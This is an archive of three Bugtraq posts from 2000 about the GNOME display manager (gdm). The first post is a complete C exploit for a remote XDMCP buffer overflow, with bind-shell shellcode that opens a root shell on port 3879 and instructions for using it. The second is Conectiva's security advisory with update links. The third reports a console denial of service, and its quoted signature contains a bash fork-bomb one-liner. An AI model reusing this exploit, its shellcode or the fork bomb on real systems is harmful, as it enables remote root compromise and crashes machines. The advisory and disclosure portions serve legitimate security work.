linux, säkerhet

5161744 2000-06-05  04:24  /162 rader/ Postmaster
Mottagare: Bugtraq (import) <11156>
Ärende: gdm exploit
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Message-ID:  <002301bfc82d$41422280$0200a8c0@ppkcbusiness.de>
Date:         Sun, 28 May 2000 00:45:27 +0200
Reply-To: abraxas@sekure.de
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: abraxas@sekure.de
Organization: abraxas
To: BUGTRAQ@SECURITYFOCUS.COM

/*
 *             gdm (xdmcp) exploit
 *         written 05/2000 by AbraxaS
 *
 *     abraxas@sekure.de && www.sekure.de
 *
 *
 * Tested on:  SuSE 6.2 / gdm-2.0beta1-4,
 *           RedHat 6.2 / gdm-2.0beta2
 *
 * Offsets: Worked with offsets between 0 and 300
 *
 * Usage: gdmexpl [target] [offset]
 *
 * Note: Just a proof of concept.
 *
 * Greetings to: dies, grue, lamagra & (silly) peak
 */


#include <stdio.h>
#include <strings.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

#define NOP 0x90

/* lammys bind shell code / binds a shell to port 3879 */
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";


int resolve (char *denise)
{
  struct hostent *info;
  unsigned long ip;

  if ((ip=inet_addr(denise))==-1)
  {
    if ((info=gethostbyname(denise))==0)
    {
      printf("Couldn't resolve [%s]\n", denise);
      exit(0);
    }
    memcpy(&ip, (info->h_addr), 4);
  }
  return (ip);
}


int main (int argc, char **argv)
{
  char uhm;
  int nadine;
  short blah[6];
  char buffy[1400]; /* you might make this buffer bigger to increase the
                       probability to hit the right addy. making the
                       buffer too big could destroy the code though */
  unsigned long addy;
  struct sockaddr_in stephanie;
  char big_buffy[sizeof(buffy)+12];

  if (argc < 3)
  {
    printf("\nGDM 2.0betaX exploit by AbraxaS (abraxas@sekure.de)"
           "\nUsage: %s [target] [offset]\n", argv[0]);
    exit(0);
  }

  addy = 0xbffff8c0-atoi(argv[2]);

  stephanie.sin_family = AF_INET;
  stephanie.sin_port = htons (177);
  stephanie.sin_addr.s_addr = resolve(argv[1]);
  nadine = socket (AF_INET, SOCK_DGRAM, 0);

  if (connect(nadine,(struct sockaddr *)&stephanie,sizeof(struct
sockaddr))<0)
  {
    perror("Connect"); exit(0);
  }

  /* filling buffer.buffy with NOPs */
  memset(buffy, NOP, sizeof(buffy));
  /* cleaning buffer.big_buffy */
  bzero(big_buffy, sizeof(big_buffy));

  /*
   *   creating XDMCP header
   */

  /* XDM_PROTOCOL_VERSION */
  blah[0] = htons(1);
  /* opcode "FORWARD_QUERY" */
  blah[1] = htons(4);
  /* length (checksum)*/
  blah[2] = htons(5+sizeof(buffy)); /* see checksum algorithm */
  /* length of display buffer */
  blah[3] = htons(sizeof(buffy));
  /* display port */
  blah[4] = htons(0);
  /* authlist */
  blah[5] = htons(0);

  *(short *)&big_buffy[0]=blah[0];
  *(short *)&big_buffy[2]=blah[1];
  *(short *)&big_buffy[4]=blah[2];
  *(short *)&big_buffy[6]=blah[3];
  *(short *)&big_buffy[sizeof(buffy)+8]=blah[4];
  *(short *)&big_buffy[sizeof(buffy)+10]=blah[5];


  /* writing shellcode */
  memcpy(buffy+sizeof(buffy)-strlen(code), code, strlen(code));

  /* fixing some stuff */
  *(long *)&buffy[0] = 0x0100007f; /* source address, not neccessary */
  *(long *)&buffy[4] = 0x00000000; /* cleaning clnt_authlist */
  *(long *)&buffy[8] = 0x00000000;

  /* writing own RET address */
  *(long *)&buffy[32]=addy;

  /* copying buffy into big_buffy */
  memcpy(big_buffy+8, buffy, sizeof(buffy));

  /* sending big_buffy */
  write(nadine, big_buffy, sizeof(big_buffy));

  printf("\nConnect to %s, port 3879 now.", argv[1]);
  printf("\nBut behave :) --abraxas\n");

  close(nadine);

}
(5161744) ------------------------------------------

5174741 2000-06-08  10:58  /62 rader/ Postmaster
Mottagare: Bugtraq (import) <11198>
Ärende: Conectiva Linux Security Announcement - gdm
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <20000607104102.K4764@conectiva.com.br>
Date:         Wed, 7 Jun 2000 10:41:02 -0300
Reply-To: Sergio Bruder <bruder@CONECTIVA.COM.BR>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Sergio Bruder <bruder@CONECTIVA.COM.BR>
X-To:         lwn@lwn.net, bos@sekure.org
To: BUGTRAQ@SECURITYFOCUS.COM

CONECTIVA LINUX SECURITY ANNOUNCEMENT


PACKAGE: gdm


SUMMARY				: Remote buffer overflow
DATE				: 2000-JUN-06
AFFECTED CONECTIVA VERSIONS	: 4.1, 4.2 and 5.0


DESCRIPTION
The gdm program is on of the graphical login choices available
for Conectiva Linux users. A serious vulnerability has been found
in this program during the XDMCP protocol processing that could
lead to remote root compromise.
In order to exploit this vulnerability, the XDMCP option has to
be explicitly enabled in /etc/X11/gdm/gdm.conf. All Conectiva
Linux versions ship with this options DISABLED by default.


SOLUTION
If you need to use XDMCP, then you MUST upgrade the gdm program
to the latest release following the links below. If XDMCP is
disabled in /etc/X11/gdm/gdm.conf, then this vulnerability cannot
be exploited.


DIRECT DOWNLOAD LINKS TO UPDATED PACKAGES:
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/i386/gdm-2.0beta4-2cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/i386/gdm-2.0beta4-2cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/gdm-2.0beta4-2cl.i386.rpm


SOURCE RPM PACKAGES ARE ALSO AVAILABLE:
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/SRPMS/gdm-2.0beta4-2cl.src.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/SRPMS/gdm-2.0beta4-2cl.src.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/SRPMS/gdm-2.0beta4-2cl.src.rpm


All packages are signed with Conectiva's PGP key. The key can be
obtained at http://www.conectiva.com.br/conectiva/contato.html

Information on how to install and/or update packages, and mirror
sites, can be found at http://www.conectiva.com.br/atualizacoes

----------------------------------------------------------------------
subscribe: atualizacoes-anuncio-subscribe@bazar.conectiva.com.br
unsubscribe: atualizacoes-anuncio-unsubscribe@bazar.conectiva.com.br
(5174741) ------------------------------------------(Ombruten)

5195550 2000-06-14  20:58  /38 rader/ Postmaster
Mottagare: Bugtraq (import) <11278>
Ärende: xfs + gdm allow DoS of console
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
Message-ID:  <00e901bfd51a$335ef3b0$1000000a@theytalk.com>
Date:         Tue, 13 Jun 2000 10:31:49 +0100
Reply-To: Mike Leonhard <mike@THEYTALK.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Mike Leonhard <mike@THEYTALK.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by samantha.lysator.liu.se id UAA03020

RedHat 6.2 further extends the xfs problem with its buggy gdm.  gdm
apparently ignores the --nodaemon option specified to it in inittab.
If the X server fails to load for whatever reason, gdm will
immediately reload it.  This causes the console to become unusable -
caught in a loop with the screen flashing every 2 seconds as the X
server tries to load.  On a machine with no network login capability
the only way out of this situation is to reboot the system by
pressing CTRL-ALT-DEL on the keyboard.  If gdm would exit when the X
server quits, then init would reload it in a safe manner - stopping
for 5 min if gdm is reloaded, I believe it is, 10 times in one minute.

RedHat's updated gdm rpm as of last week did not resolve this issue.
I wonder if it was a good idea to move the 'fixed' font into xfs.  I
have had good experiences with xfstt, but I have always had my normal
X fonts loaded directly from disk.

Mike_L
mike@theytalk.com


----- Original Message ----- 
From: "Michal Zalewski" <lcamtuf@TPI.PL>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Sunday, April 16, 2000 2:31 PM
Subject: xfs

Due to improper input validation (NULL pointer occours on strcpy()), any
user may crash X fontserver under RedHat 6.x, causing effective DoS for
whole X server :)
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
(5195550) ------------------------------------------(Ombruten)